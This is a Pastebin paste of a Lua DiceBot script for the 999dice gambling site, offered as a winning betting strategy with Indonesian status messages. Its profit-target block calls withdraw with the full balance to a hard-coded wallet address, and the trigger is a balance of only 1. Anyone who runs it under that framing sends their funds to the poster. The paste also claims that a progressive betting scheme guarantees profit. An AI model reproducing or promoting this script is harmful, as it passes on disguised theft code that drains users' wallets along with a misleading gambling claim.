Advertisement
futuregood

999dice.com bot script

May 15th, 2017
1,518
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.67 KB | None | 0 0
  1. This strategy to dicebot 999dice
  2. After login u 999dice account at dicebot
  3. choice
  4. 1. Setting mode
  5. 2. Progammer
  6. 3. at right u display choice code
  7. input scrypt to win at 999dice
  8. chance = 90
  9. bethigh = true
  10. basebet = balance/1000
  11. nextbet = basebet
  12.  
  13. amount=balance
  14. profittarget=1
  15. stoptarget=0
  16.  
  17. function dobet()
  18. if (win) then
  19. chance = 90
  20. basebet = balance/1000
  21. nextbet = basebet
  22. else
  23. if chance == 25.00 then
  24. nextbet = previousbet * 1.33738
  25. else
  26. chance = 25.00
  27. nextbet = basebet/3.3
  28. print("-----------------------------------------")
  29. print(" ")
  30. print("Kamu menang ") print(profit) print(" untuk saat ini")
  31. print(" ")
  32. print("Balance kamu ") print(balance)
  33. print(" ")
  34. print("-----------------------------------------")
  35. resetseed();
  36. end
  37. end
  38.  
  39.  
  40.  
  41.  
  42.  
  43.  
  44. if balance <= stoptarget then
  45. stop()
  46. end
  47.  
  48. if (balance) >= profittarget then
  49.  
  50. ching()
  51. alarm()
  52. print("Balance kamu ") print(balance)
  53. print(" ")
  54. print("TARGET TERPENUHI!!!")
  55. print(" ")
  56. print("TARGET TERPENUHI!!!")
  57. print(" ")
  58. print("TARGET TERPENUHI!!!")
  59. print(" ")
  60. print("TARGET TERPENUHI!!!")
  61. print(" ")
  62. print("Kamu menang ") print(profit) print(" untuk saat ini")
  63. print(" ")
  64. print("Withdrawing Target Amount ") print(amount) print(" DOGE")
  65.  
  66.  
  67. withdraw(amount,"1M3xHKiJrxVQSK6A7vdbGPfYynzPtk1RD")
  68.  
  69. print(" ")
  70. print("LANJUT CARI DOGE LAGI BROO!!!")
  71.  
  72.  
  73. resetseed();
  74.  
  75.  
  76.  
  77. end
  78.  
  79. end
  80.  
  81. And choice console tab write start()
  82. See u profit after bot work
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement